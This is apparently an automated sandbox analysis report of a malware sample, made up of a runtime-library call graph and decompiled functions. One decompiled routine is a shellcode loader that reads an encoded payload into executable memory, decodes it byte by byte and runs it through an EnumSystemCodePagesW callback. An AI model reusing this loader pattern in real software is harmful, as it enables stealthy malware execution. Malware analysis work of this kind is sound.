7036 d763a5 7033->7036 7035 d71cc3 __cftoe2_l 58 API calls 7034->7035 7037 d76389 7035->7037 7043 d74bfc 7036->7043 7039 d71e89 __cftoe2_l 9 API calls 7037->7039 7039->7040 7040->6688 7041 d78b0f 60 API calls __towlower_l 7042 d763b0 7041->7042 7042->7040 7042->7041 7044 d74c0d 7043->7044 7050 d74c5a 7043->7050 7045 d736db __write_nolock 58 API calls 7044->7045 7046 d74c13 7045->7046 7047 d74c3a 7046->7047 7051 d77356 7046->7051 7047->7050 7066 d74f1d 7047->7066 7050->7042 7052 d77362 __wsopen_helper 7051->7052 7053 d736db __write_nolock 58 API calls 7052->7053 7054 d7736b 7053->7054 7055 d7739a 7054->7055 7056 d7737e 7054->7056 7057 d7442f __lock 58 API calls 7055->7057 7058 d736db __write_nolock 58 API calls 7056->7058 7059 d773a1 7057->7059 7060 d77383 7058->7060 7078 d773d6 7059->7078 7064 d717be __lock 58 API calls 7060->7064 
7065 d77391 __wsopen_helper 7060->7065 7064->7065 7065->7047 7067 d74f29 __wsopen_helper 7066->7067 7068 d736db __write_nolock 58 API calls 7067->7068 7069 d74f33 7068->7069 7070 d7442f __lock 58 API calls 7069->7070 7071 d74f45 7069->7071 7076 d74f63 7070->7076 7072 d74f53 __wsopen_helper 7071->7072 7074 d717be __lock 58 API calls 7071->7074 7072->7050 7073 d74f90 7116 d74fba 7073->7116 7074->7072 7076->7073 7077 d74831 _free 58 API calls 7076->7077 7077->7073 7079 d773e1 ___addlocaleref ___removelocaleref 7078->7079 7081 d773b5 7078->7081 7079->7081 7085 d7715c 7079->7085 7082 d773cd 7081->7082 7115 d74599 LeaveCriticalSection 7082->7115 7084 d773d4 7084->7060 7086 d771d5 7085->7086 7094 d77171 7085->7094 7087 d77222 7086->7087 7088 d74831 _free 58 API calls 7086->7088 7091 d78d75 ___free_lc_time 58 API calls 7087->7091 7109 d7724b 7087->7109 7089 d771f6 7088->7089 7092 d74831 _free 58 API calls 7089->7092 7090 d771a2 7093 d771c0 7090->7093 7103 d74831 _free 58 API calls 7090->7103 7095 d77240 7091->7095 7097 d77209 7092->7097 7098 d74831 _free 58 API calls 7093->7098 7094->7086 7094->7090 7099 d74831 _free 58 API calls 7094->7099 7100 d74831 _free 58 API calls 7095->7100 7096 d772aa 7101 d74831 _free 58 API calls 7096->7101 7102 d74831 _free 58 API calls 7097->7102 7104 d771ca 7098->7104 7105 d77197 7099->7105 7100->7109 7107 d772b0 7101->7107 7108 d77217 7102->7108 7110 d771b5 7103->7110 7111 d74831 _free 58 API calls 7104->7111 7106 d78c12 ___free_lconv_mon 58 API calls 7105->7106 7106->7090 7107->7081 7112 d74831 _free 58 API calls 7108->7112 7109->7096 7113 d74831 58 API calls _free 7109->7113 7114 d78d0e ___free_lconv_num 58 API calls 7110->7114 7111->7086 7112->7087 7113->7109 7114->7093 7115->7084 7119 d74599 LeaveCriticalSection 7116->7119 7118 d74fc1 7118->7071 7119->7118 7121 d71fdc 7120->7121 7122 d71ffb LeaveCriticalSection 7120->7122 7121->7122 7123 d71fe3 7121->7123 7122->6662 7126 d74599 LeaveCriticalSection 7123->7126 7125 d71ff8 7125->6662 
7126->7125 7128 d7149c __wsopen_helper 7127->7128 7129 d714df 7128->7129 7130 d714d7 __wsopen_helper 7128->7130 7133 d714b2 _memset 7128->7133 7140 d71f5e 7129->7140 7130->6610 7134 d71cc3 __cftoe2_l 58 API calls 7133->7134 7136 d714cc 7134->7136 7137 d71e89 __cftoe2_l 9 API calls 7136->7137 7137->7130 7141 d71f90 EnterCriticalSection 7140->7141 7142 d71f6e 7140->7142 7143 d714e5 7141->7143 7142->7141 7144 d71f76 7142->7144 7146 d712b0 7143->7146 7145 d7442f __lock 58 API calls 7144->7145 7145->7143 7147 d712e6 7146->7147 7150 d712cb _memset 7146->7150 7160 d71519 7147->7160 7148 d712d6 7149 d71cc3 __cftoe2_l 58 API calls 7148->7149 7158 d712db 7149->7158 7150->7147 7150->7148 7152 d71326 7150->7152 7151 d71e89 __cftoe2_l 9 API calls 7151->7147 7152->7147 7154 d71437 _memset 7152->7154 7163 d72873 7152->7163 7170 d72a2a 7152->7170 7238 d72752 7152->7238 7258 d72897 7152->7258 7157 d71cc3 __cftoe2_l 58 API calls 7154->7157 7157->7158 7158->7151 7161 d71fcd __wfsopen 2 API calls 7160->7161 7162 d7151f 7161->7162 7162->7130 7164 d72892 7163->7164 7165 d7287d 7163->7165 7164->7152 7166 d71cc3 __cftoe2_l 58 API calls 7165->7166 7167 d72882 7166->7167 7168 d71e89 __cftoe2_l 9 API calls 7167->7168 7169 d7288d 7168->7169 7169->7152 7171 d72a62 7170->7171 7172 d72a4b 7170->7172 7174 d7319a 7171->7174 7179 d72a9c 7171->7179 7173 d71c8f __write 58 API calls 7172->7173 7176 d72a50 7173->7176 7175 d71c8f __write 58 API calls 7174->7175 7177 d7319f 7175->7177 7178 d71cc3 __cftoe2_l 58 API calls 7176->7178 7181 d71cc3 __cftoe2_l 58 API calls 7177->7181 7184 d72a57 7178->7184 7180 d72aa4 7179->7180 7188 d72abb 7179->7188 7182 d71c8f __write 58 API calls 7180->7182 7183 d72ab0 7181->7183 7185 d72aa9 7182->7185 7186 d71e89 __cftoe2_l 9 API calls 7183->7186 7184->7152 7189 d71cc3 __cftoe2_l 58 API calls 7185->7189 7186->7184 7187 d72ad0 7190 d71c8f __write 58 API calls 7187->7190 7188->7184 7188->7187 7191 d72aea 7188->7191 7192 d72b08 7188->7192 7189->7183 7190->7185 7191->7187 7193 
d72af5 7191->7193 7194 d748b1 __malloc_crt 58 API calls 7192->7194 7196 d76c34 __read_nolock 58 API calls 7193->7196 7195 d72b18 7194->7195 7197 d72b20 7195->7197 7198 d72b3b 7195->7198 7199 d72c09 7196->7199 7200 d71cc3 __cftoe2_l 58 API calls 7197->7200 7202 d77054 __lseeki64_nolock 60 API calls 7198->7202 7201 d72c82 ReadFile 7199->7201 7206 d72c1f GetConsoleMode 7199->7206 7203 d72b25 7200->7203 7204 d72ca4 7201->7204 7205 d73162 GetLastError 7201->7205 7202->7193 7207 d71c8f __write 58 API calls 7203->7207 7204->7205 7212 d72c74 7204->7212 7208 d72c62 7205->7208 7209 d7316f 7205->7209 7210 d72c33 7206->7210 7211 d72c7f 7206->7211 7207->7184 7216 d71ca2 __dosmaperr 58 API calls 7208->7216 7220 d72c68 7208->7220 7213 d71cc3 __cftoe2_l 58 API calls 7209->7213 7210->7211 7214 d72c39 ReadConsoleW 7210->7214 7211->7201 7212->7220 7221 d72cd9 7212->7221 7222 d72f46 7212->7222 7217 d73174 7213->7217 7214->7212 7215 d72c5c GetLastError 7214->7215 7215->7208 7216->7220 7218 d71c8f __write 58 API calls 7217->7218 7218->7220 7219 d74831 _free 58 API calls 7219->7184 7220->7184 7220->7219 7224 d72d45 ReadFile 7221->7224 7230 d72dc6 7221->7230 7222->7220 7228 d7304c ReadFile 7222->7228 7225 d72d66 GetLastError 7224->7225 7234 d72d70 7224->7234 7225->7234 7226 d72e83 7232 d72e33 MultiByteToWideChar 7226->7232 7233 d77054 __lseeki64_nolock 60 API calls 7226->7233 7227 d72e73 7231 d71cc3 __cftoe2_l 58 API calls 7227->7231 7229 d7306f GetLastError 7228->7229 7237 d7307d 7228->7237 7229->7237 7230->7220 7230->7226 7230->7227 7230->7232 7231->7220 7232->7215 7232->7220 7233->7232 7234->7221 7235 d77054 __lseeki64_nolock 60 API calls 7234->7235 7235->7234 7236 d77054 __lseeki64_nolock 60 API calls 7236->7237 7237->7222 7237->7236 7239 d7275d 7238->7239 7244 d72772 7238->7244 7240 d71cc3 __cftoe2_l 58 API calls 7239->7240 7242 d72762 7240->7242 7241 d7276d 7241->7152 7243 d71e89 __cftoe2_l 9 API calls 7242->7243 7243->7241 7244->7241 7245 d727a7 7244->7245 7305 d765a7 7244->7305 
7247 d72873 __flush 58 API calls 7245->7247 7248 d727bb 7247->7248 7272 d72916 7248->7272 7250 d727c2 7250->7241 7251 d72873 __flush 58 API calls 7250->7251 7252 d727e5 7251->7252 7252->7241 7253 d72873 __flush 58 API calls 7252->7253 7254 d727f1 7253->7254 7254->7241 7255 d72873 __flush 58 API calls 7254->7255 7256 d727fe 7255->7256 7257 d72873 __flush 58 API calls 7256->7257 7257->7241 7259 d728a6 7258->7259 7263 d728a2 _memmove 7258->7263 7260 d728ad 7259->7260 7265 d728c0 _memset 7259->7265 7261 d71cc3 __cftoe2_l 58 API calls 7260->7261 7262 d728b2 7261->7262 7264 d71e89 __cftoe2_l 9 API calls 7262->7264 7263->7152 7264->7263 7265->7263 7266 d728f7 7265->7266 7267 d728ee 7265->7267 7266->7263 7269 d71cc3 __cftoe2_l 58 API calls 7266->7269 7268 d71cc3 __cftoe2_l 58 API calls 7267->7268 7270 d728f3 7268->7270 7269->7270 7271 d71e89 __cftoe2_l 9 API calls 7270->7271 7271->7263 7273 d72922 __wsopen_helper 7272->7273 7274 d72946 7273->7274 7275 d7292f 7273->7275 7277 d72a0a 7274->7277 7280 d7295a 7274->7280 7276 d71c8f __write 58 API calls 7275->7276 7279 d72934 7276->7279 7278 d71c8f __write 58 API calls 7277->7278 7281 d7297d 7278->7281 7282 d71cc3 __cftoe2_l 58 API calls 7279->7282 7283 d72985 7280->7283 7284 d72978 7280->7284 7289 d71cc3 __cftoe2_l 58 API calls 7281->7289 7296 d7293b __wsopen_helper 7282->7296 7286 d729a7 7283->7286 7287 d72992 7283->7287 7285 d71c8f __write 58 API calls 7284->7285 7285->7281 7288 d76c88 ___lock_fhandle 59 API calls 7286->7288 7290 d71c8f __write 58 API calls 7287->7290 7291 d729ad 7288->7291 7292 d7299f 7289->7292 7293 d72997 7290->7293 7294 d729d3 7291->7294 7295 d729c0 7291->7295 7299 d71e89 __cftoe2_l 9 API calls 7292->7299 7297 d71cc3 __cftoe2_l 58 API calls 7293->7297 7300 d71cc3 __cftoe2_l 58 API calls 7294->7300 7298 d72a2a __read_nolock 70 API calls 7295->7298 7296->7250 7297->7292 7301 d729cc 7298->7301 7299->7296 7302 d729d8 7300->7302 7308 d72a02 7301->7308 7303 d71c8f __write 58 API calls 7302->7303 7303->7301 7306 
d748b1 __malloc_crt 58 API calls 7305->7306 7307 d765bc 7306->7307 7307->7245 7311 d7702e LeaveCriticalSection 7308->7311 7310 d72a08 7310->7296 7311->7310 7315 d71932 7312->7315 7314 d717d9 7316 d7193e __wsopen_helper 7315->7316 7317 d7442f __lock 51 API calls 7316->7317 7318 d71945 7317->7318 7319 d719fe __cinit 7318->7319 7320 d71973 DecodePointer 7318->7320 7335 d71a4c 7319->7335 7320->7319 7322 d7198a DecodePointer 7320->7322 7328 d7199a 7322->7328 7324 d71a5b __wsopen_helper 7324->7314 7326 d719a7 EncodePointer 7326->7328 7327 d71a43 7329 d71a4c 7327->7329 7330 d717a8 __mtinitlocknum 3 API calls 7327->7330 7328->7319 7328->7326 7331 d719b7 DecodePointer EncodePointer 7328->7331 7332 d71a59 7329->7332 7340 d74599 LeaveCriticalSection 7329->7340 7330->7329 7334 d719c9 DecodePointer DecodePointer 7331->7334 7332->7314 7334->7328 7336 d71a52 7335->7336 7337 d71a2c 7335->7337 7341 d74599 LeaveCriticalSection 7336->7341 7337->7324 7339 d74599 LeaveCriticalSection 7337->7339 7339->7327 7340->7332 7341->7337 7467 d78bc0 7468 d78bcc __wsopen_helper 7467->7468 7469 d78c03 __wsopen_helper 7468->7469 7470 d7442f __lock 58 API calls 7468->7470 7471 d78be0 7470->7471 7472 d773d6 __updatetlocinfoEx_nolock 58 API calls 7471->7472 7473 d78bf0 7472->7473 7475 d78c09 7473->7475 7478 d74599 LeaveCriticalSection 7475->7478 7477 d78c10 7477->7469 7478->7477 7553 d72460 7554 d72497 7553->7554 7555 d7248a 7553->7555 7557 d75770 __cftoe2_l 6 API calls 7554->7557 7556 d75770 __cftoe2_l 6 API calls 7555->7556 7556->7554 7559 d724a7 __except_handler4 7557->7559 7558 d725bf 7559->7558 7560 d72574 __except_handler4 7559->7560 7565 d724fe __IsNonwritableInCurrentImage 7559->7565 7560->7558 7561 d725af 7560->7561 7562 d75770 __cftoe2_l 6 API calls 7560->7562 7563 d75770 __cftoe2_l 6 API calls 7561->7563 7562->7561 7563->7558 7571 d72722 RtlUnwind 7565->7571 7566 d725d6 7568 d75770 __cftoe2_l 6 API calls 7566->7568 7567 d7253c __except_handler4 7567->7566 7569 d75770 __cftoe2_l 6 API calls 
7567->7569 7570 d725e6 __except_handler4 7568->7570 7569->7566 7571->7567 7817 d7a92c 7820 d7a94d 7817->7820 7819 d7a948 7821 d7a9b7 7820->7821 7822 d7a958 7820->7822 7888 d7ae9e 7821->7888 7822->7821 7823 d7a95d 7822->7823 7825 d7a962 7823->7825 7826 d7a97b 7823->7826 7834 d7b058 7825->7834 7828 d7a99e 7826->7828 7830 d7a985 7826->7830 7875 d7a9d3 7828->7875 7853 d7b119 7830->7853 7833 d7a99c 7833->7819 7905 d7c11f 7834->7905 7837 d7b09d 7840 d7b0b5 7837->7840 7841 d7b0a5 7837->7841 7838 d7b08d 7839 d71cc3 __cftoe2_l 58 API calls 7838->7839 7842 d7b092 7839->7842 7917 d7bfa7 7840->7917 7843 d71cc3 __cftoe2_l 58 API calls 7841->7843 7845 d71e89 __cftoe2_l 9 API calls 7842->7845 7846 d7b0aa 7843->7846 7849 d7b099 7845->7849 7847 d71e89 __cftoe2_l 9 API calls 7846->7847 7847->7849 7848 d7b0e8 7848->7849 7926 d7af6c 7848->7926 7851 d75770 __cftoe2_l 6 API calls 7849->7851 7852 d7a976 7851->7852 7852->7819 7854 d7c11f __fltout2 58 API calls 7853->7854 7855 d7b147 7854->7855 7856 d7b161 7855->7856 7857 d7b14e 7855->7857 7859 d7b17c 7856->7859 7860 d7b169 7856->7860 7858 d71cc3 __cftoe2_l 58 API calls 7857->7858 7862 d7b153 7858->7862 7864 d7bfa7 __fptostr 58 API calls 7859->7864 7861 d71cc3 __cftoe2_l 58 API calls 7860->7861 7863 d7b16e 7861->7863 7865 d71e89 __cftoe2_l 9 API calls 7862->7865 7866 d71e89 __cftoe2_l 9 API calls 7863->7866 7867 d7b1a8 7864->7867 7868 d7b15a 7865->7868 7866->7868 7867->7868 7870 d7b1ee 7867->7870 7873 d7b1c8 7867->7873 7869 d75770 __cftoe2_l 6 API calls 7868->7869 7872 d7b214 7869->7872 7955 d7ad4d 7870->7955 7872->7833 7874 d7af6c __cftof2_l 58 API calls 7873->7874 7874->7868 7876 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7875->7876 7877 d7a9f8 7876->7877 7878 d7aa0f 7877->7878 7879 d7aa18 7877->7879 7880 d71cc3 __cftoe2_l 58 API calls 7878->7880 7882 d7aa21 7879->7882 7885 d7aa35 7879->7885 7881 d7aa14 7880->7881 7884 d71e89 __cftoe2_l 9 API calls 7881->7884 7883 d71cc3 __cftoe2_l 58 API calls 7882->7883 7883->7881 7887 d7aa30 
_memset __alldvrm __cftoa_l _strrchr 7884->7887 7885->7887 7987 d7ad2f 7885->7987 7887->7833 7889 d7c11f __fltout2 58 API calls 7888->7889 7890 d7aed0 7889->7890 7891 d7aee7 7890->7891 7892 d7aed7 7890->7892 7894 d7aeee 7891->7894 7895 d7aef8 7891->7895 7893 d71cc3 __cftoe2_l 58 API calls 7892->7893 7896 d7aedc 7893->7896 7897 d71cc3 __cftoe2_l 58 API calls 7894->7897 7899 d7bfa7 __fptostr 58 API calls 7895->7899 7898 d71e89 __cftoe2_l 9 API calls 7896->7898 7897->7896 7903 d7aee3 7898->7903 7900 d7af38 7899->7900 7901 d7ad4d __cftoe2_l 58 API calls 7900->7901 7900->7903 7901->7903 7902 d75770 __cftoe2_l 6 API calls 7904 d7af68 7902->7904 7903->7902 7904->7833 7906 d7c148 ___dtold 7905->7906 7933 d7c3bd 7906->7933 7911 d7c1a0 7914 d71e99 __invoke_watson 8 API calls 7911->7914 7912 d7c18a 7913 d75770 __cftoe2_l 6 API calls 7912->7913 7915 d7b086 7913->7915 7916 d7c1ac 7914->7916 7915->7837 7915->7838 7918 d7bfcf 7917->7918 7919 d7bfb9 7917->7919 7918->7919 7923 d7bfd5 7918->7923 7920 d71cc3 __cftoe2_l 58 API calls 7919->7920 7921 d7bfbe 7920->7921 7922 d71e89 __cftoe2_l 9 API calls 7921->7922 7925 d7bfc8 _memmove _strlen 7922->7925 7924 d71cc3 __cftoe2_l 58 API calls 7923->7924 7923->7925 7924->7921 7925->7848 7927 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7926->7927 7928 d7af89 7927->7928 7929 d7afa5 _memset __shift 7928->7929 7930 d71cc3 __cftoe2_l 58 API calls 7928->7930 7929->7849 7931 d7af9b 7930->7931 7932 d71e89 __cftoe2_l 9 API calls 7931->7932 7932->7929 7937 d7c412 7933->7937 7934 d7c435 7936 d75770 __cftoe2_l 6 API calls 7934->7936 7935 d7c484 7939 d7b7bd __cftoe2_l 58 API calls 7935->7939 7938 d7c163 7936->7938 7937->7935 7940 d7c49d 7937->7940 7941 d7c424 7937->7941 7946 d7b7bd 7938->7946 7939->7941 7943 d7b7bd __cftoe2_l 58 API calls 7940->7943 7941->7934 7945 d7cd59 7941->7945 7942 d71e99 __invoke_watson 8 API calls 7944 d7cd90 7942->7944 7943->7941 7945->7942 7947 d7b7d6 7946->7947 7948 d7b7c8 7946->7948 7949 d71cc3 __cftoe2_l 58 API calls 
7947->7949 7948->7947 7952 d7b7ec 7948->7952 7950 d7b7dd 7949->7950 7951 d71e89 __cftoe2_l 9 API calls 7950->7951 7953 d7b7e7 7951->7953 7952->7953 7954 d71cc3 __cftoe2_l 58 API calls 7952->7954 7953->7911 7953->7912 7954->7950 7956 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7955->7956 7957 d7ad60 7956->7957 7958 d7ad6d 7957->7958 7959 d7ad76 7957->7959 7960 d71cc3 __cftoe2_l 58 API calls 7958->7960 7962 d7ad9f __shift 7959->7962 7963 d7ad8b 7959->7963 7961 d7ad72 7960->7961 7965 d71e89 __cftoe2_l 9 API calls 7961->7965 7966 d7b7bd __cftoe2_l 58 API calls 7962->7966 7964 d71cc3 __cftoe2_l 58 API calls 7963->7964 7964->7961 7970 d7ad9a _memmove 7965->7970 7967 d7ae16 7966->7967 7968 d71e99 __invoke_watson 8 API calls 7967->7968 7967->7970 7969 d7ae9d 7968->7969 7971 d7c11f __fltout2 58 API calls 7969->7971 7970->7868 7972 d7aed0 7971->7972 7973 d7aee7 7972->7973 7974 d7aed7 7972->7974 7976 d7aeee 7973->7976 7977 d7aef8 7973->7977 7975 d71cc3 __cftoe2_l 58 API calls 7974->7975 7978 d7aedc 7975->7978 7979 d71cc3 __cftoe2_l 58 API calls 7976->7979 7981 d7bfa7 __fptostr 58 API calls 7977->7981 7980 d71e89 __cftoe2_l 9 API calls 7978->7980 7979->7978 7982 d7aee3 7980->7982 7983 d7af38 7981->7983 7985 d75770 __cftoe2_l 6 API calls 7982->7985 7983->7982 7984 d7ad4d __cftoe2_l 58 API calls 7983->7984 7984->7982 7986 d7af68 7985->7986 7986->7868 7988 d7ae9e __cftoe_l 58 API calls 7987->7988 7989 d7ad48 7988->7989 7989->7887 7479 d71ec9 7480 d71ed1 7479->7480 7481 d74869 __calloc_crt 58 API calls 7480->7481 7482 d71eeb 7481->7482 7483 d71f04 7482->7483 7484 d74869 __calloc_crt 58 API calls 7482->7484 7484->7483 7990 d7b2a9 7993 d7b2c1 7990->7993 7994 d7b2d2 7993->7994 7995 d7b2eb 7993->7995 7999 d79549 7994->7999 8008 d795d7 7995->8008 7998 d7b2bc 8000 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7999->8000 8001 d7956d 8000->8001 8011 d7a184 8001->8011 8006 d75770 __cftoe2_l 6 API calls 8007 d795d3 8006->8007 8007->7998 8023 d794a5 8008->8023 8012 d7a1cc 8011->8012 
8018 d7a1dc ___mtold12 8011->8018 8013 d71cc3 __cftoe2_l 58 API calls 8012->8013 8014 d7a1d1 8013->8014 8015 d71e89 __cftoe2_l 9 API calls 8014->8015 8015->8018 8016 d75770 __cftoe2_l 6 API calls 8017 d79585 8016->8017 8019 d796a0 8017->8019 8018->8016 8022 d796f8 8019->8022 8020 d75770 __cftoe2_l 6 API calls 8021 d79592 8020->8021 8021->8006 8022->8020 8024 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8023->8024 8025 d794d2 8024->8025 8026 d7a184 ___strgtold12_l 58 API calls 8025->8026 8027 d794ea 8026->8027 8032 d79c12 8027->8032 8030 d75770 __cftoe2_l 6 API calls 8031 d79545 8030->8031 8031->7998 8035 d79c6a 8032->8035 8033 d75770 __cftoe2_l 6 API calls 8034 d79507 8033->8034 8034->8030 8035->8033

                        Control-flow Graph

                        [Figure: control-flow graph for the function starting at d712b0; legend: Executed / Not Executed]
                        C-Code - Quality: 69%
                        			E00D712B0(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                        				char* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				void* __ebx;
                        				void* __esi;
                        				signed int _t74;
                        				signed int _t78;
                        				char _t81;
                        				signed int _t86;
                        				signed int _t88;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t97;
                        				signed int _t98;
                        				char* _t99;
                        				signed int _t100;
                        				signed int _t102;
                        				signed int _t103;
                        				signed int _t104;
                        				char* _t110;
                        				signed int _t113;
                        				signed int _t117;
                        				signed int _t119;
                        				void* _t120;
                        
                        				_t99 = _a4;
                        				_t74 = _a8;
                        				_v8 = _t99;
                        				_v12 = _t74;
                        				if(_a12 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t97 = _a16;
                        				if(_t97 == 0) {
                        					goto L5;
                        				}
                        				if(_t99 != 0) {
                        					_t119 = _a20;
                        					__eflags = _t119;
                        					if(_t119 == 0) {
                        						L9:
                        						__eflags = _a8 - 0xffffffff;
                        						if(_a8 != 0xffffffff) {
                        							_t74 = E00D71530(_t99, 0, _a8);
                        							_t120 = _t120 + 0xc;
                        						}
                        						__eflags = _t119;
                        						if(_t119 == 0) {
                        							goto L3;
                        						} else {
                        							_t78 = _t74 | 0xffffffff;
                        							__eflags = _t97 - _t78 / _a12;
                        							if(_t97 > _t78 / _a12) {
                        								goto L3;
                        							}
                        							L13:
                        							_t117 = _a12 * _t97;
                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        							_t98 = _t117;
                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        								_t100 = 0x1000;
                        							} else {
                        								_t100 =  *(_t119 + 0x18);
                        							}
                        							_v16 = _t100;
                        							__eflags = _t117;
                        							if(_t117 == 0) {
                        								L41:
                        								return _a16;
                        							} else {
                        								do {
                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        										L24:
                        										__eflags = _t98 - _t100;
                        										if(_t98 < _t100) {
                        											_t81 = E00D72752(_t98, _t119, _t119); // executed
                        											__eflags = _t81 - 0xffffffff;
                        											if(_t81 == 0xffffffff) {
                        												L46:
                        												return (_t117 - _t98) / _a12;
                        											}
                        											_t102 = _v12;
                        											__eflags = _t102;
                        											if(_t102 == 0) {
                        												L42:
                        												__eflags = _a8 - 0xffffffff;
                        												if(_a8 != 0xffffffff) {
                        													E00D71530(_a4, 0, _a8);
                        												}
                        												 *((intOrPtr*)(E00D71CC3())) = 0x22;
                        												L4:
                        												E00D71E89();
                        												goto L5;
                        											}
                        											_t110 = _v8;
                        											 *_t110 = _t81;
                        											_t98 = _t98 - 1;
                        											_v8 = _t110 + 1;
                        											_t103 = _t102 - 1;
                        											__eflags = _t103;
                        											_v12 = _t103;
                        											_t100 =  *(_t119 + 0x18);
                        											_v16 = _t100;
                        											goto L40;
                        										}
                        										__eflags = _t100;
                        										if(_t100 == 0) {
                        											_t86 = 0x7fffffff;
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t86 = _t98;
                        											}
                        										} else {
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t44 = _t98 % _t100;
                        												__eflags = _t44;
                        												_t113 = _t44;
                        												_t91 = _t98;
                        											} else {
                        												_t113 = 0x7fffffff % _t100;
                        												_t91 = 0x7fffffff;
                        											}
                        											_t86 = _t91 - _t113;
                        										}
                        										__eflags = _t86 - _v12;
                        										if(_t86 > _v12) {
                        											goto L42;
                        										} else {
                        											_push(_t86);
                        											_push(_v8);
                        											_push(E00D72873(_t119)); // executed
                        											_t88 = E00D72A2A(); // executed
                        											_t120 = _t120 + 0xc;
                        											__eflags = _t88;
                        											if(_t88 == 0) {
                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                        												goto L46;
                        											}
                        											__eflags = _t88 - 0xffffffff;
                        											if(_t88 == 0xffffffff) {
                        												L45:
                        												_t64 = _t119 + 0xc;
                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                        												__eflags =  *_t64;
                        												goto L46;
                        											}
                        											_t98 = _t98 - _t88;
                        											__eflags = _t98;
                        											L36:
                        											_v8 = _v8 + _t88;
                        											_v12 = _v12 - _t88;
                        											_t100 = _v16;
                        											goto L40;
                        										}
                        									}
                        									_t94 =  *(_t119 + 4);
                        									_v20 = _t94;
                        									__eflags = _t94;
                        									if(__eflags == 0) {
                        										goto L24;
                        									}
                        									if(__eflags < 0) {
                        										goto L45;
                        									}
                        									__eflags = _t98 - _t94;
                        									if(_t98 < _t94) {
                        										_t94 = _t98;
                        										_v20 = _t98;
                        									}
                        									_t104 = _v12;
                        									__eflags = _t94 - _t104;
                        									if(_t94 > _t104) {
                        										goto L42;
                        									} else {
                        										E00D72897(_v8, _t104,  *_t119, _t94);
                        										_t88 = _v20;
                        										_t120 = _t120 + 0x10;
                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                        										_t98 = _t98 - _t88;
                        										 *_t119 =  *_t119 + _t88;
                        										goto L36;
                        									}
                        									L40:
                        									__eflags = _t98;
                        								} while (_t98 != 0);
                        								goto L41;
                        							}
                        						}
                        					}
                        					_t74 = (_t74 | 0xffffffff) / _a12;
                        					__eflags = _t97 - _t74;
                        					if(_t97 <= _t74) {
                        						goto L13;
                        					}
                        					goto L9;
                        				}
                        				L3:
                        				 *((intOrPtr*)(E00D71CC3())) = 0x16;
                        				goto L4;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction ID: 7100eee9444e1edd4926910414a3c15ba6e0780f65ec087109f216d529f89e78
                        • Opcode Fuzzy Hash: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction Fuzzy Hash: C751CE38A006059BDB248FAD88856AEB7B1AF41324F28C729F87D966D1F770DD508B74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 92%
                        			E00D71000(void* __ecx, void* __eflags, intOrPtr _a12) {
                        				intOrPtr _v8;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t6;
                        				void* _t7;
                        				_Unknown_base(*)()* _t8;
                        				void* _t14;
                        				_Unknown_base(*)()* _t15;
                        				void* _t20;
                        				void* _t21;
                        				void* _t22;
                        				intOrPtr* _t28;
                        
                        				_push(_t14);
                        				_t22 = 0; // executed
                        				_t6 = E00D7113F(_t14, _t20, 0, 0x17d78400); // executed
                        				 *_t28 = 0xd83000;
                        				_v8 = _t6;
                        				_t7 = E00D711D1(_a12, _t21); // executed
                        				_t8 = VirtualAlloc(0, 0x137a, 0x3000, 0x40); // executed
                        				_t15 = _t8;
                        				E00D71475(_t15, 0x137a, 1, _t7); // executed
                        				_t10 = _v8;
                        				if(_v8 != 0) {
                        					E00D71530(_t10, 0xcb, 0x17d78400);
                        					do {
                        						 *((char*)(_t15 + _t22)) =  *((char*)(_t15 + _t22)) + 0xcf;
                        						_t22 = _t22 + 1;
                        					} while (_t22 < 0x137a);
                        					EnumSystemCodePagesW(_t15, 0); // executed
                        				}
                        				return 0;
                        			}

                        APIs
                        • _malloc.LIBCMT ref: 00D7100E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                          • Part of subcall function 00D711D1: __wfsopen.LIBCMT ref: 00D711DC
                        • VirtualAlloc.KERNELBASE(00000000,0000137A,00003000,00000040), ref: 00D71036
                        • __fread_nolock.LIBCMT ref: 00D71048
                        • _memset.LIBCMT ref: 00D71062
